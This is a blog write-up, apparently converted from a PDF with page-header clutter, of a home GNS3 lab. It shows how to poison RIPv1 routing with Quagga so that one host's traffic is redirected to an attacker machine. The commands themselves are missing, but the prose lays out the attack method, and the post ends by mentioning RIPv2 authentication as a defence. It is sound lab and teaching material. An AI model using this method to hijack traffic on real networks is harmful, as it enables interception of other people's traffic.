ikiloh, exploiting ripv1 - digininja

8/16/2019 Ikiloh, Exploiting RIPv1 - DigiNinja

1/9

22/2/2016 Blog, Exploiting RIPv1 - DigiNinja

https://digi.ninja/blog/rip_v1.php 2/13

I started by building the lab using the same 3660 image I used with the VLAN labs but

after getting it all set up and running I checked the RIP routing information on all the

routers and all showed the correct routing but all routes had a metric of 1 rather than the

correct values. For example, on R1 there are two hops to the 192.168.1.0 network but it

had a metric of just one. After some searching it turned out that this is a known problem

with a bunch of devices including the 3660, see this GNS3 forum post for more

information.

So, I rebuilt it all using 3745s. These worked but after I shut the lab down and brought it

back up the configurations were all missing. I thought I'd messed up and rebuilt it all and

made sure I saved everything. Another reboot and the config was gone again. More

searching found this forum post which explains that there is a bug with this device and

Dynamips where it won't restore the config on boot.

For the third go I used a 2611, these are old and limited devices but in the end workedsuccessfully.

I added an NM-4E module to each of the devices, technically this wasn't needed but gives

four extra Ethernet interfaces that may come in useful later.

The following table shows the configuration of each router

Host Interface IP Connected To

R1 e1/0 10.0.0.1 R2 e1/0

R1 e1/3 192.168.0.1 SW1

R2 e1/0 10.0.0.2 R1 e1/0

http://forum.gns3.net/post8573.htmlhttp://forum.gns3.net/topic2665.html


2/9



R2 e1/1 11.0.0.2 R3 e1/1

R3 e1/1 11.0.0.1 R2 e1/1

R3 e1/3 192.168.1.1 SW2

C1 VirtualPC 1 192.168.0.100 SW1

C2 VirtualPC 2 192.168.1.100 SW2

C3 VirtualPC 3 192.168.0.102 SW1VBox VirtualBox 192.168.0.101 SW1

SW1 and SW2 are standard GNS3 switches, I tried to use a 3660 with a switch module

installed to give more flexibility in the future but for some reason this didn't work properly

so stuck with the generic GNS3 one. C3 isn't really necessary but was useful just for

checking connectivity.

To make it easier to set all this up, here are the commands which will put the three routers

into the right state. (Download ready for cut and paste)

https://digi.ninja/files/rip_lab_setup_commands.txt


3/9



Once you have the routers set up you can check that RIP is running correctly by using the

command at the enable prompt. As the help text explains, an R in the left hand column

means the device learned the route through RIP. Assuming you have the correct routes

you can check connectivity by pinging other devices.

If all that works then the next thing to do is to setup the virtual PCs and the VirtualBox

machine. I covered most of this in my first GNS3 and VirtualBox lab so won't cover it all

again here however there is one extra step you need now that we are venturing beyond a

single subnet.

To get out of our subnet and see the world you need to to add a default gateway when

https://digi.ninja/blog/rip_v1.php


4/9



setting the IP address. You do this in the second parameter to the ip command. The

gateway IP is the IP of the machine which connects the subnet to the rest of the network

so for C1 this is 192.168.0.1 and for C2 192.168.1.1.

Once you have set the IP of both machines you can check connectivity with some pings.

If you find that the pings are failing, the best way to debug is to go back to the routers and

check each of them can ping correctly, check R1 can talk to both IPs on R2, that R2 and

can talk to R3 then R1 to R3. Check the routing table on each to make sure it knows

where to send the traffic. If all that works then check C1 can talk to each of the routers.

Break it all down and the mistakes tend to be a lot easier to find. This is where C3 can be

useful to check that the mistake isn't with C1.

For the VirtualBox machine I'm using the same machine as in the VLAN lab. In here I set

the IP and default route and again test connectivity.


5/9



The Attack

After all the setup it is now time to attack the network. The plan is to hijack traffic from C1

heading to C2 and have it delivered to the VBox instead. This will be done by injecting a

new route into the network by generating our own RIP packets. We will need to send a

packet advertising a route to the 192.168.1.0/24 subnet with a lower metric (number of

hops) than the real router. Checking the router table on R1 shows the metric to get to

192.168.1.0/24 is 2 so we will have to advertise our route with a metric of 1 to be

successful.

I was initially thinking of using some kind of attack tool or creating custom packets in

Scapy but while researching this project I came across Quagga, a Linux package which

implements a router in software. As this is specifically designed to talk the various routing

protocols, including RIP, I figured it would be much better to use this than an "attack" tool.

Quagga is pretty simple to set up and can be installed on VBox with:

The config files are stored in /etc/quagga and all we need to edit are the following two

files:

http://www.nongnu.org/quagga/


6/9



daemons

ripd.conf

This simply tells the router that it is talking RIP on eth0 and advertising the route to

192.168.1.0/24.

As we are planning to hijack traffic heading to C2 I also add a virtual interface to eth0 with

the IP address of C2 which allows us to act as C2 once the traffic arrives. If all you want to

do is to sniff traffic then you can create a dummy interface on the machine and give that

the appropriate IP. I found that if I didn't have an interface on the machine with an IP in the

right network then things didn't work as well as with it. This may just have been the way I

was doing things but as setting up the interface is easy either way it is worth doing.

To create the virtual interface you can do:

To create a dummy interface you do:

Before starting Quagga lets start up Wireshark so we can see the packets we are creating

and make sure they look right. To do this in GNS3 right click on the link between R1 and

SW1 and select "Start capturing", in the capture list on the right hand side, right click on


7/9



the capture and select "Start Wireshark". Add a RIP filter in Wireshark and put it to one

side.

Now that everything is in place we can start Quagga.

Switch back to Wireshark and, if everything is setup correctly, you will start to see RIP

packets coming from 192.168.0.101 advertising it's ability to route to 192.168.1.0 with a

metric of 1.

To see if the poisoning is working check R1 to see what it thinks the best route to

192.168.1.0 is.


8/9



Comparing with the image above it can be seen that the route has changed from:

to:

We are now in place, lets prove it by hijacking some traffic. On VBox start tcpdump

listening for ICMP traffic then on C1 try to ping C2 (192.168.1.100)


9/9


https://digi ninja/blog/rip v1 php 10/13

And there we have it, VBox is receiving the pings from C1 (192.168.0.100) which are

supposed to be for C2 (192.168.1.100).

Summary

As you can see, this attack is very simple to execute and does not require any special

hacking tools. It is slightly limited in that once you have poisoned the route you are then

not able to communicate with the original destination unless you have a second route to it

as you have destroyed the valid route, this means you can't easily do man-in-the-middle

attacks. You are also limited over what areas of the network you can poison, in this

example it was possible to have R1 accept the new route as VBox is only one hop away

while whereas C2 is two hops. If there was another network connected to the right of R3

then the hop count from VBox would be higher than that from R3 so the poisoning would

not affect it.

If RIP must be used then version 2 offers a small defence against this by adding

authentication, I'll look at that, and its effectiveness, in the part two.

Project Categories

Wifi
https://digi.ninja/projects_wifi.php

ikiloh, exploiting ripv1 - digininja

Documents